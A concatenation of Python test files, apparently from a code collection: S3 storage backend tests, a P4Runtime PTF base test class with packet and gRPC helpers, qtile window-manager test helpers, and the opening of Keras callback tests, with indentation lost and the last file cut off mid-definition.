""" "2.txt" not in files list "%s".""" % (files,))
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
|
base_test.py
|
# Copyright 2013-2020 Barefoot Networks, Inc.
# Copyright 2020-2021 Open Networking Foundation
# Copyright 2021-present Princeton University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Antonin Bas (antonin@barefootnetworks.com)
# Carmelo Cascone (carmelo@opennetworking.org)
#
import logging
# https://stackoverflow.com/questions/24812604/hide-scapy-warning-message-ipv6
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import itertools
import queue
import sys
import threading
import time
from io import StringIO
from functools import wraps, partial
from unittest import SkipTest
import grpc
import ptf
import scapy.packet
import scapy.utils
from google.protobuf import text_format
from google.rpc import status_pb2, code_pb2
from ipaddress import ip_address
from p4.config.v1 import p4info_pb2
from p4.v1 import p4runtime_pb2, p4runtime_pb2_grpc
from ptf import config
from ptf import testutils as testutils
from ptf.base_tests import BaseTest
from ptf.dataplane import match_exp_pkt
from ptf.packet import IP
from scapy.layers.inet6 import *
from scapy.layers.l2 import Ether
from scapy.pton_ntop import inet_pton, inet_ntop
from scapy.utils6 import in6_getnsma, in6_getnsmac
from helper import P4InfoHelper
DEFAULT_PRIORITY = 10
IPV6_MCAST_MAC_1 = "33:33:00:00:00:01"
SWITCH1_MAC = "00:00:00:00:aa:01"
SWITCH2_MAC = "00:00:00:00:aa:02"
SWITCH3_MAC = "00:00:00:00:aa:03"
HOST1_MAC = "00:00:00:00:00:01"
HOST2_MAC = "00:00:00:00:00:02"
MAC_BROADCAST = "FF:FF:FF:FF:FF:FF"
MAC_FULL_MASK = "FF:FF:FF:FF:FF:FF"
MAC_MULTICAST = "33:33:00:00:00:00"
MAC_MULTICAST_MASK = "FF:FF:00:00:00:00"
SWITCH1_IPV6 = "2001:0:1::1"
SWITCH2_IPV6 = "2001:0:2::1"
SWITCH3_IPV6 = "2001:0:3::1"
SWITCH4_IPV6 = "2001:0:4::1"
HOST1_IPV6 = "2001:0000:85a3::8a2e:370:1111"
HOST2_IPV6 = "2001:0000:85a3::8a2e:370:2222"
IPV6_MASK_ALL = "FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF"
ARP_ETH_TYPE = 0x0806
IPV6_ETH_TYPE = 0x86DD
ICMPV6_IP_PROTO = 58
NS_ICMPV6_TYPE = 135
NA_ICMPV6_TYPE = 136
def print_inline(text):
sys.stdout.write(text)
sys.stdout.flush()
# See https://gist.github.com/carymrobbins/8940382
# functools.partialmethod is introduced in Python 3.4
class partialmethod(partial):
def __get__(self, instance, owner):
if instance is None:
return self
return partial(self.func, instance, *(self.args or ()), **(self.keywords or {}))
# Convert integer (with length) to binary byte string
# Equivalent to Python 3.2 int.to_bytes
# See
# https://stackoverflow.com/questions/16022556/has-python-3-to-bytes-been-back-ported-to-python-2-7
def stringify(n, length):
h = '%x' % n
s = ('0' * (len(h) % 2) + h).zfill(length * 2).decode('hex')
return s
def ipv4_to_binary(addr):
bytes_ = [int(b, 10) for b in addr.split('.')]
return "".join(chr(b) for b in bytes_)
def ipv6_to_binary(addr):
ip = ip_address(addr.decode("utf-8"))
return ip.packed
def mac_to_binary(addr):
bytes_ = [int(b, 16) for b in addr.split(':')]
return "".join(chr(b) for b in bytes_)
def format_pkt_match(received_pkt, expected_pkt):
# Taken from PTF dataplane class
stdout_save = sys.stdout
try:
# The scapy packet dissection methods print directly to stdout,
# so we have to redirect stdout to a string.
sys.stdout = StringIO()
print("========== EXPECTED ==========")
if isinstance(expected_pkt, scapy.packet.Packet):
scapy.packet.ls(expected_pkt)
print('--')
scapy.utils.hexdump(expected_pkt)
print("========== RECEIVED ==========")
if isinstance(received_pkt, scapy.packet.Packet):
scapy.packet.ls(received_pkt)
print('--')
scapy.utils.hexdump(received_pkt)
print("==============================")
return sys.stdout.getvalue()
finally:
sys.stdout.close()
sys.stdout = stdout_save # Restore the original stdout.
def format_pb_msg_match(received_msg, expected_msg):
result = StringIO()
result.write("========== EXPECTED PROTO ==========\n")
result.write(text_format.MessageToString(expected_msg))
result.write("========== RECEIVED PROTO ==========\n")
result.write(text_format.MessageToString(received_msg))
result.write("==============================\n")
val = result.getvalue()
result.close()
return val
def pkt_mac_swap(pkt):
orig_dst = pkt[Ether].dst
pkt[Ether].dst = pkt[Ether].src
pkt[Ether].src = orig_dst
return pkt
def pkt_route(pkt, mac_dst):
pkt[Ether].src = pkt[Ether].dst
pkt[Ether].dst = mac_dst
return pkt
def pkt_decrement_ttl(pkt):
if IP in pkt:
pkt[IP].ttl -= 1
elif IPv6 in pkt:
pkt[IPv6].hlim -= 1
return pkt
def genNdpNsPkt(target_ip, src_mac=HOST1_MAC, src_ip=HOST1_IPV6):
nsma = in6_getnsma(inet_pton(socket.AF_INET6, target_ip))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm) / IPv6(dst=d, src=src_ip, hlim=255)
p /= ICMPv6ND_NS(tgt=target_ip)
p /= ICMPv6NDOptSrcLLAddr(lladdr=src_mac)
return p
def genNdpNaPkt(target_ip, target_mac, src_mac=SWITCH1_MAC, dst_mac=IPV6_MCAST_MAC_1,
src_ip=SWITCH1_IPV6, dst_ip=HOST1_IPV6):
p = Ether(src=src_mac, dst=dst_mac)
p /= IPv6(dst=dst_ip, src=src_ip, hlim=255)
p /= ICMPv6ND_NA(tgt=target_ip)
p /= ICMPv6NDOptDstLLAddr(lladdr=target_mac)
return p
class P4RuntimeErrorFormatException(Exception):
"""Used to indicate that the gRPC error Status object returned by the server has
an incorrect format.
"""
def __init__(self, message):
super(P4RuntimeErrorFormatException, self).__init__(message)
# Used to iterate over the p4.Error messages in a gRPC error Status object
class P4RuntimeErrorIterator:
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
self.grpc_error = grpc_error
error = None
# The gRPC Python package does not have a convenient way to access the
# binary details for the error: they are treated as trailing metadata.
for meta in itertools.chain(self.grpc_error.initial_metadata(),
self.grpc_error.trailing_metadata()):
if meta[0] == "grpc-status-details-bin":
error = status_pb2.Status()
error.ParseFromString(meta[1])
break
if error is None:
raise P4RuntimeErrorFormatException("No binary details field")
if len(error.details) == 0:
raise P4RuntimeErrorFormatException(
"Binary details field has empty Any details repeated field")
self.errors = error.details
self.idx = 0
def __iter__(self):
return self
def __next__(self):
while self.idx < len(self.errors):
p4_error = p4runtime_pb2.Error()
one_error_any = self.errors[self.idx]
if not one_error_any.Unpack(p4_error):
raise P4RuntimeErrorFormatException("Cannot convert Any message to p4.Error")
if p4_error.canonical_code == code_pb2.OK:
continue
v = self.idx, p4_error
self.idx += 1
return v
raise StopIteration
# P4Runtime uses a 3-level message in case of an error during the processing of
# a write batch. This means that if we do not wrap the grpc.RpcError inside a
# custom exception, we can end-up with a non-helpful exception message in case
# of failure as only the first level will be printed. In this custom exception
# class, we extract the nested error message (one for each operation included in
# the batch) in order to print error code + user-facing message. See P4 Runtime
# documentation for more details on error-reporting.
class P4RuntimeWriteException(Exception):
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
super(P4RuntimeWriteException, self).__init__()
self.errors = []
try:
error_iterator = P4RuntimeErrorIterator(grpc_error)
for error_tuple in error_iterator:
self.errors.append(error_tuple)
except P4RuntimeErrorFormatException:
raise # just propagate exception for now
def __str__(self):
message = "Error(s) during Write:\n"
for idx, p4_error in self.errors:
code_name = code_pb2._CODE.values_by_number[p4_error.canonical_code].name
message += "\t* At index {}: {}, '{}'\n".format(idx, code_name, p4_error.message)
return message
# This code is common to all tests. setUp() is invoked at the beginning of the
# test and tearDown is called at the end, no matter whether the test passed /
# failed / errored.
# noinspection PyUnresolvedReferences
class P4RuntimeTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
# Setting up PTF dataplane
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
self._swports = []
for device, port, ifname in config["interfaces"]:
self._swports.append(port)
self.port1 = self.swports(0)
self.port2 = self.swports(1)
self.port3 = self.swports(2)
grpc_addr = testutils.test_param_get("grpcaddr")
if grpc_addr is None:
grpc_addr = 'localhost:50051'
self.device_id = int(testutils.test_param_get("device_id"))
if self.device_id is None:
self.fail("Device ID is not set")
self.cpu_port = int(testutils.test_param_get("cpu_port"))
if self.cpu_port is None:
self.fail("CPU port is not set")
pltfm = testutils.test_param_get("pltfm")
if pltfm is not None and pltfm == 'hw' and getattr(self, "_skip_on_hw", False):
raise SkipTest("Skipping test in HW")
self.channel = grpc.insecure_channel(grpc_addr)
self.stub = p4runtime_pb2_grpc.P4RuntimeStub(self.channel)
proto_bin_path = testutils.test_param_get("p4info")
# print "Importing p4info proto from", proto_bin_path
self.p4info = p4info_pb2.P4Info()
with open(proto_bin_path, "rb") as fin:
self.p4info.ParseFromString(fin.read())
self.helper = P4InfoHelper(self.p4info)
# used to store write requests sent to the P4Runtime server, useful for
# autocleanup of tests (see definition of autocleanup decorator below)
self.reqs = []
self.election_id = 1
self.set_up_stream()
def set_up_stream(self):
self.stream_out_q = queue.Queue()
self.stream_in_q = queue.Queue()
def stream_req_iterator():
while True:
p = self.stream_out_q.get()
if p is None:
break
yield p
def stream_recv(stream):
for p in stream:
self.stream_in_q.put(p)
self.stream = self.stub.StreamChannel(stream_req_iterator())
self.stream_recv_thread = threading.Thread(target=stream_recv, args=(self.stream,))
self.stream_recv_thread.start()
self.handshake()
def handshake(self):
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = self.device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = self.election_id
self.stream_out_q.put(req)
rep = self.get_stream_message("arbitration", timeout=2)
if rep is None:
self.fail("Failed to establish handshake")
def tearDown(self):
self.tear_down_stream()
BaseTest.tearDown(self)
def tear_down_stream(self):
self.stream_out_q.put(None)
self.stream_recv_thread.join()
def get_packet_in(self, timeout=2):
msg = self.get_stream_message("packet", timeout)
if msg is None:
self.fail("PacketIn message not received")
else:
return msg.packet
def get_digest_list(self, timeout=2, fail=True):
msg = self.get_stream_message("digest", timeout)
if msg is None:
if fail:
self.fail("DigestList message not received")
else:
pass
else:
return msg.digest
def verify_packet_in(self, exp_packet_in_msg, timeout=2):
rx_packet_in_msg = self.get_packet_in(timeout=timeout)
# Check payload first, then metadata
rx_pkt = Ether(rx_packet_in_msg.payload)
exp_pkt = exp_packet_in_msg.payload
if not match_exp_pkt(exp_pkt, rx_pkt):
self.fail("Received PacketIn.payload is not the expected one\n" +
format_pkt_match(rx_pkt, exp_pkt))
rx_meta_dict = {m.metadata_id: m.value for m in rx_packet_in_msg.metadata}
exp_meta_dict = {m.metadata_id: m.value for m in exp_packet_in_msg.metadata}
shared_meta = {
mid: rx_meta_dict[mid]
for mid in rx_meta_dict
if mid in exp_meta_dict and rx_meta_dict[mid] == exp_meta_dict[mid]
}
if len(rx_meta_dict) is not len(exp_meta_dict) \
or len(shared_meta) is not len(exp_meta_dict):
self.fail("Received PacketIn.metadata is not the expected one\n" +
format_pb_msg_match(rx_packet_in_msg, exp_packet_in_msg))
def verify_digest_list(self, digest_name, exp_data, timeout=2):
rx_digest_list_msg = self.get_digest_list(timeout=timeout)
exp_digest_id = self.helper.get_digests_id(digest_name)
self.assertEquals(exp_digest_id, rx_digest_list_msg.digest_id,
"Received digest_id doe snot match expected one")
rx_data_list = rx_digest_list_msg.data
if len(rx_data_list) != 1:
self.fail("Received DigestList.data should have only 1 entry, %s found" %
len(rx_data_list))
rx_data = rx_data_list[0]
if exp_data != rx_data:
self.fail("Received DigestList.data[0] is not the expected one\n" +
format_pb_msg_match(rx_data, exp_data))
def verify_no_other_digest_list(self, timeout=1):
rx_digest_list_msg = self.get_digest_list(timeout=timeout, fail=False)
if rx_digest_list_msg is not None:
self.fail("Received DigestList but expected none")
def get_stream_message(self, type_, timeout=1):
start = time.time()
try:
while True:
remaining = timeout - (time.time() - start)
if remaining < 0:
break
msg = self.stream_in_q.get(timeout=remaining)
if not msg.HasField(type_):
continue
return msg
except: # timeout expired
pass
return None
def send_packet_out(self, packet_out):
packet_out_req = p4runtime_pb2.StreamMessageRequest()
packet_out_req.packet.CopyFrom(packet_out)
self.stream_out_q.put(packet_out_req)
def swports(self, idx):
if idx >= len(self._swports):
self.fail("Index {} is out-of-bound of port map".format(idx))
return self._swports[idx]
def _write(self, req):
try:
return self.stub.Write(req)
except grpc.RpcError as e:
if e.code() != grpc.StatusCode.UNKNOWN:
raise e
raise P4RuntimeWriteException(e)
def write_request(self, req, store=True):
rep = self._write(req)
if store:
self.reqs.append(req)
return rep
def modify(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
self.insert(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.MODIFY
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def insert(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
self.insert(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
elif isinstance(entity, p4runtime_pb2.ActionProfileGroup):
msg_entity = update.entity.action_profile_group
elif isinstance(entity, p4runtime_pb2.ActionProfileMember):
msg_entity = update.entity.action_profile_member
elif isinstance(entity, p4runtime_pb2.DigestEntry):
msg_entity = update.entity.digest_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def delete(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
self.remove(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.DELETE
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def get_new_write_request(self):
req = p4runtime_pb2.WriteRequest()
req.device_id = self.device_id
election_id = req.election_id
election_id.high = 0
election_id.low = self.election_id
return req
def insert_pre_multicast_group(self, group_id, ports):
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
pre_entry = update.entity.packet_replication_engine_entry
mg_entry = pre_entry.multicast_group_entry
mg_entry.multicast_group_id = group_id
for port in ports:
replica = mg_entry.replicas.add()
replica.egress_port = port
replica.instance = 0
return req, self.write_request(req)
def insert_pre_clone_session(self, session_id, ports, cos=0, packet_length_bytes=0):
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
pre_entry = update.entity.packet_replication_engine_entry
clone_entry = pre_entry.clone_session_entry
clone_entry.session_id = session_id
clone_entry.class_of_service = cos
clone_entry.packet_length_bytes = packet_length_bytes
for port in ports:
replica = clone_entry.replicas.add()
replica.egress_port = port
replica.instance = 1
return req, self.write_request(req)
# iterates over all requests in reverse order; if they are INSERT updates,
# replay them as DELETE updates; this is a convenient way to clean-up a lot
# of switch state
def undo_write_requests(self, reqs):
updates = []
for req in reversed(reqs):
for update in reversed(req.updates):
if update.type == p4runtime_pb2.Update.INSERT:
updates.append(update)
new_req = self.get_new_write_request()
for update in updates:
update.type = p4runtime_pb2.Update.DELETE
new_req.updates.add().CopyFrom(update)
self._write(new_req)
# this decorator can be used on the runTest method of P4Runtime PTF tests
# when it is used, the undo_write_requests will be called at the end of the test
# (irrespective of whether the test was a failure, a success, or an exception
# was raised). When this is used, all write requests must be performed through
# one of the send_request_* convenience functions, or by calling write_request;
# do not use stub.Write directly!
# most of the time, it is a great idea to use this decorator, as it makes the
# tests less verbose. In some circumstances, it is difficult to use it, in
# particular when the test itself issues DELETE request to remove some
# objects. In this case you will want to do the cleanup yourself (in the
# tearDown function for example); you can still use undo_write_request which
# should make things easier.
# because the PTF test writer needs to choose whether or not to use autocleanup,
# it seems more appropriate to define a decorator for this rather than do it
# unconditionally in the P4RuntimeTest tearDown method.
def autocleanup(f):
@wraps(f)
def handle(*args, **kwargs):
test = args[0]
assert (isinstance(test, P4RuntimeTest))
try:
return f(*args, **kwargs)
finally:
test.undo_write_requests(test.reqs)
return handle
def skip_on_hw(cls):
cls._skip_on_hw = True
return cls
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
def __init__(self, fail_msg='retry failed!', ignore_exceptions=(),
dt=sleep_time, tmax=max_sleep, return_on_fail=False):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
class BareConfig(Config):
auto_fullscreen = True
groups = [
config.Group("a"),
config.Group("b"),
config.Group("c"),
config.Group("d")
]
layouts = [
layout.stack.Stack(num_stacks=1),
layout.stack.Stack(num_stacks=2)
]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == 'OK':
return True
return False
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
with various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg='Window never appeared...')
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError('window is still in client list!')
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal"):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
return self._spawn_window(python, path, "--name", wmclass, name, wm_type)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
@Retry(ignore_exceptions=(AssertionError,), fail_msg='Window did not die!')
def assert_window_died(client, window_info):
client.sync()
wid = window_info['id']
assert wid not in set([x['id'] for x in client.windows()])
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from csv import reader
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.test_utils import keras_test
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
@keras_test
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
# case 1 fit
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
# case 2 fit_generator
def data_generator():
max_batch_index = len(X_train) // batch_size
i = 0
while 1:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train),
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
@keras_test
def test_stop_training_csv(tmpdir):
np.random.seed(1337)
fp = str(tmpdir / 'test.csv')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
model = Sequential()
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(X_train) // batch_size
tot = 0
while 1:
if tot > 3 * len(X_train):
yield np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan
else:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
tot += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train) // batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in reader(f):
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
os.remove(fp)
@keras_test
def test_ModelCheckpoint(tmpdir):
